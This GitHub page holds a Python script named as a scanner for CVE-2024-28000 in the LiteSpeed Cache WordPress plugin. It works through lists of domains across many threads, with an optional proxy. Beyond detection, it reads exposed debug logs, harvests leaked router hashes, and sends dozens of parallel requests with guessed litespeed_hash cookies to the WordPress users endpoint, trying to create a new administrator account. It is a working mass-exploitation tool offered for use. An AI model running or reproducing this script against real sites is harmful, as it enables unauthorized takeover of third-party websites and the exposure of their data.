-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2024-28000_Scan.py
150 lines (135 loc) · 6.55 KB
/
CVE-2024-28000_Scan.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
import re
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import argparse
from colorama import Fore, Style
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
from concurrent.futures import ThreadPoolExecutor
from inspect import signature
from fake_useragent import UserAgent
ua = UserAgent()
from urllib.parse import urlparse
import queue
from alive_progress import alive_bar
import string
import random
import concurrent.futures
import time
def check_vulnerability(domain):
if not domain[-1] in string.ascii_letters + string.digits:
domain = domain[:-1]
else:
url_list_x = []
if not (domain.lower()).startswith(('http://', 'https://', 'http://www.', 'https://www.')):
tar_1 = 'https://www.' + domain
tar_2 = 'https://' + domain
tar_3 = 'http://www.' + domain
tar_4 = 'http://' + domain
url_list_x.append(tar_1)
url_list_x.append(tar_2)
url_list_x.append(tar_3)
url_list_x.append(tar_4)
else:
url_list_x.append(domain)
def send_request(url):
user_data = {
'username': "asdasdsad",
'password': "asdasdsad",
'email': '[email protected]',
'roles': ['administrator']
}
cookies = {
"litespeed_hash": ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(6)),
"litespeed_role": "1"}
try:
response3 = requests.post(f'{target}/wp-json/wp/v2/users', cookies=cookies, json=user_data,
verify=False, timeout=40, proxies=proxies)
except:
pass
for target in url_list_x:
headers = {
'User-Agent': ua.random,
}
try:
response = requests.get(target + "/wp-content/plugins/litespeed-cache/readme.txt", headers=headers, verify=False, timeout=30, proxies=proxies)
match1 = re.search(r"Stable tag:\s*([0-9]+\.[0-9]+(?:\.[0-9]+)*)", response.text)
match2 = re.search(r"Stable tag:\s*(6\.[4-9]|[7-9]\.\d|6\.3\.0\.[2-9]|6\.3\.[1-9]\d*)", response.text)
if match1 and not match2:
response_1 = requests.get(target + "/wp-admin/admin-ajax.php?action=async_litespeed&litespeed_type=crawler", headers=headers, verify=False, timeout=30, proxies=proxies)
if response_1.status_code == 200 and len(response_1.text) < 5:
print('\033[92m' + "[CVE-2024-28000] -> " + str(target) + '\033[0m')
open('CVE-2024-28000_VU.txt', 'a').write(target + '\n')
response_x = requests.get(target + "/wp-content/debug.log", headers=headers,
verify=False, timeout=30, proxies=proxies)
lines1 = response_x.text.splitlines()
first_linesxxxxx = lines1[:10000]
first_lines = ''.join(first_linesxxxxx)
if ('PHP Deprecated:' in first_lines) or ('PHP Notice:' in first_lines) or (
'X-LiteSpeed-Cache-Control:' in first_lines) or ('PHP Fatal error:' in first_lines) or (
'PHP Warning:' in first_lines) or ('X-LiteSpeed-Tag:' in first_lines) or (
'Crawling [url]' in first_lines) or ('Response headers' in first_lines):
print('\033[92m' + "[Debug Page] -> " + str(target) + '\033[0m')
open('Debug_page.txt', 'a').write(str(target) + '\n')
with concurrent.futures.ThreadPoolExecutor(max_workers=50) as executor:
responses_xx = list(executor.map(send_request, [target] * 50))
response4 = requests.get(target + "/wp-content/debug.log", headers=headers, verify=False,
timeout=30, proxies=proxies)
lines = response4.text.splitlines()
first_2000_lines = lines[:10000]
for mm in first_2000_lines:
if '[Router] hash not match' in mm:
print('\033[92m' + "[Debug Get HASH] -> " + str(target) + " | " + mm +'\033[0m')
open('Wp-Debug-Hash.txt', 'a').write(target + "|" + mm +'\n')
break
else:
pass
except:
pass
def process_urls(url_queue, update_bar):
while True:
url = url_queue.get()
if url is None:
url_queue.task_done()
break
try:
check_vulnerability(url)
except:
pass
finally:
url_queue.task_done()
update_bar()
def process_file(file_path, scan_thread):
urls = []
with open(file_path, 'r', encoding='utf-8') as file:
urls = [line.strip() for line in file]
url_queue = queue.Queue()
num_workers = min(int(scan_thread), len(urls))
with alive_bar(len(urls), bar='smooth', enrich_print=False) as bar:
with ThreadPoolExecutor(max_workers=num_workers) as executor:
for _ in range(num_workers):
executor.submit(process_urls, url_queue, bar)
for url in urls:
url_queue.put(url)
for _ in range(num_workers):
url_queue.put(None)
url_queue.join()
print(Fore.GREEN + ' CVE-2024-28000 Scan \n' + Style.RESET_ALL)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='CVE-2024-28000 Scan')
parser.add_argument('-f', type=str, required=False, help='File list')
parser.add_argument('-t', type=str, required=False, help="Scan thread")
parser.add_argument('-p', '--proxy', dest="proxy", help="Example: socks5://127.0.0.1:10808", required=False)
args = parser.parse_args()
global proxies
if (args.proxy):
proxies = {
"socks5": args.proxy
}
else:
proxies = ''
file_list = args.f
scan_thread = args.t
if file_list is not None and scan_thread is not None:
process_file(file_list, scan_thread)
else:
print(" -h to get help")